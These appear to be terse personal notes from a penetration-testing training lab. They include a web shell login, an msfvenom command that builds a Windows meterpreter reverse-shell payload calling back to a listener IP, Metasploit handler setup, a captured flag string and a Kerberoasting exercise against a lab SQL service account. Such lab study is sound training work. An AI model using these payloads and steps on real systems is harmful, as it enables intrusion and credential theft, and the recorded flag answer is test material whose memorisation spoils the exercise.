admin:My_W3bsH3ll_P@ssw0rd!
/uploads
msfvenom -p windows/meterpreter/reverse_tcp --format exe LHOST=10.10.17.50 -o payload.exe
Then use exploit/multi/handler, payload windows/meterpreter/reverse_tcp
Run meterpreter using upload provided by webshell
→ JusT_g3tt1ng_st@rt3d!
Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer
With Bloodhound, the account is:
setuserspn.exe doesn’t work (powershell errors)